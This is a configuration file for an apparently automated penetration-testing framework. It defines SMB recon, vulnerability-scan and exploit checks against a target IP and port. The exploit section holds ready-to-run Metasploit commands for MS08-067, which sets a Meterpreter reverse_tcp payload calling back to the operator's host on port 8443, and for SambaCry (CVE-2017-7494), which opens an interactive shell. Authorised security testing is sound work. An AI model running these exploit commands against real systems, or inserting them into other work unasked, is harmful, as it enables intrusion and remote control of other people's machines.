#########################################################################################
# SMB Settings
#########################################################################################

[config]
default_port = 445
protocol	 = tcp
categories 	 = recon, vulnscan, exploit

[specific_options]
vuln-ms08-067 = boolean
vuln-ms17-010 = boolean
vuln-sambacry = boolean


#########################################################################################
# Recon
#########################################################################################
[check_nmap-recon]
name        = nmap-recon
category    = recon
description = Recon using Nmap SMB scripts
tool        = nmap
command_1   = sudo nmap -sV -Pn -vv -p [PORT] --script='smb* AND NOT smb-brute* AND NOT smb-vuln*' --stats-every 10s [IP]

[check_anonymous-enum]
name        = anonymous-enum
category    = recon
description = Attempt to perform enum (users, shares...) without account
tool        = enum4linux
command_1   = perl enum4linux.pl -a [IP]


#########################################################################################
# Vulnscan
#########################################################################################
[check_nmap-vulnscan]
name        = nmap-vulnscan
category    = vulnscan
description = Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap
tool        = nmap
command_1   = sudo nmap -sV -Pn -vv -p [PORT] --script='smb-vuln*' --stats-every 10s [IP]
postrun     = nmap_detect_vulns

[check_samba-rce-cve2015-0240]
name        = samba-rce-cve2015-0240
category    = vulnscan
description = Check for RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X
tool        = metasploit
command_1   = sudo msfconsole -x "use auxiliary/scanner/smb/smb_uninit_cred; set RHOSTS [IP]; set RPORT [PORT]; run; exit"


#########################################################################################
# Exploit
#########################################################################################
[check_exploit-rce-ms08-067]
name        = exploit-rce-ms08-067
category    = exploit
description = Exploit for RCE vuln MS08-067 on SMB
tool        = metasploit
command_1   = sudo msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set RPORT [PORT]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [LOCALIP]; set LPORT 8443; exploit"
context_1   = { 'vuln-ms08-067': True }

# [check_exploit-rce-ms17-010-eternalblue]
# name        = exploit-rce-ms17-010-eternalblue
# category    = exploit
# description = Exploit for RCE vuln MS17-010 EternalBlue on SMB
# tool        = 


[check_exploit-sambacry-rce-cve2017-7494]
name        = exploit-sambacry-rce-cve2017-7494
category    = exploit
description = Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494)
tool        = metasploit
# Creds not required for exploitation if server has a guest account
command_1   = sudo msfconsole -x "use exploit/linux/samba/is_known_pipename; set RHOST [IP]; set RPORT [PORT]; set PAYLOAD cmd/unix/interact; exploit"
context_1   = { 'vuln-sambacry': True }